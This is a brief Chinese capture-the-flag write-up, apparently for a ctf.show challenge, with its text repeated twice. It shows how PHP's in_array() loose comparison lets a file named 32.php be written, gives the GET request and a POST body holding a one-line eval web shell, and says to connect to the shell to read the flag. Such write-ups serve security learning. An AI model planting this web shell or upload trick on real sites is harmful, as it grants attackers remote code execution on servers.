利用in_array()函数的缺陷PHP特性
先上传马
GET:
http://8b793ac4-d623-43ec-806e-f704150e2d45.challenge.ctf.show/?n=32.php
POST:
content=<?php @eval($_POST[a]);?>
然后再连接马就可以cat flag了
利用in_array()函数的缺陷PHP特性
先上传马
GET:
http://8b793ac4-d623-43ec-806e-f704150e2d45.challenge.ctf.show/?n=32.php
POST:
content=<?php @eval($_POST[a]);?>
然后再连接马就可以cat flag了